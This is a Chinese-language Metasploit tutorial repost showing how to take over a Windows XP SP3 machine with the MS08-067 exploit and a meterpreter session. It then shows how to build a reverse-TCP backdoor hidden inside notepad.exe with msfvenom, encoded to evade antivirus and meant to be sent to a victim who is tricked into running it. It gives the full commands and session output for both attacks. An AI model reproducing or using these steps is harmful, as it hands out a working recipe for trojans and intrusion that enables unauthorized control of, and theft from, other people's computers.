打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
msfconsole使用手册

我使用ubuntu;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。

本文演示怎么使用Metasploit入侵windows xp sp3。

启动msfconsole:

# msfconsole

选择一个漏洞:

msf > search platform: windows xp sp3 

exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great。

查看某个漏洞的详细信息;包含使用方法、支持的平台等等,非常有帮助:

msf > info exploit/windows/smb/ms08_067_netapi

依次执行如下命令:

  1. msf > use exploit/windows/smb/ms08_067_netapi
  2. > set payload windows/meterpreter/bind_tcp
  3. > set RHOST 192.168.0.108 (设置目标主机IP地址)
  4. > exploit

如果目标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使用其他漏洞。

  1. [*] Started bind handler
  2. [*] Automatically detecting the target...
  3. [*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese
  4. [*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)
  5. [*] Attempting to trigger the vulnerability...
  6. [*] Sending stage (751104 bytes) to 192.168.0.108
  7. [*] Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32
  8. meterpreter >

现在你就可以控制目标主机了,可以截屏、录音、视频、下载文件、杀进程等等;使用help查看可以执行的命令。

演示使用后门程序侵入Windows

原理:在Kali Linux上生成后门程序,然后把它发送给受害者,欺骗受害者运行(使用邮件、图片等等)。难点是需要过杀毒软件和防火墙。

生成后门程序:

我把后门程序隐藏到记事本程序中:notepad.exe

查看Kali Linux的IP:ifconfig(192.168.0.112)

创建后门程序,my_backdoor.exe:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe > my_backdoor.exe

上面命令使用加密试图躲过杀毒软件,但是,不要期望它可以生效。使用man msfvenom查看帮助。

把它发送到Windows系统,并运行;如果不能运行换用其他加密方式。

启动msfconsole:

# msfconsole
  1. use exploit/multi/handler
  2. set LHOST 192.168.0.112
  3. set LPORT 4445
  4. set payload windows/meterpreter/reverse_tcp
  5. show options
  6. exploit

等待受害者启动后门程序。

OK,入侵成功。

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
metasploit的pivot实例详解,msf实例讲解,内网审计
2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用
内网渗透二:meterpreter的一些利用
当Strust2遇到防火墙,你的思路够骚吗?
使用Metasploit(msf)通过ms17
kali
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服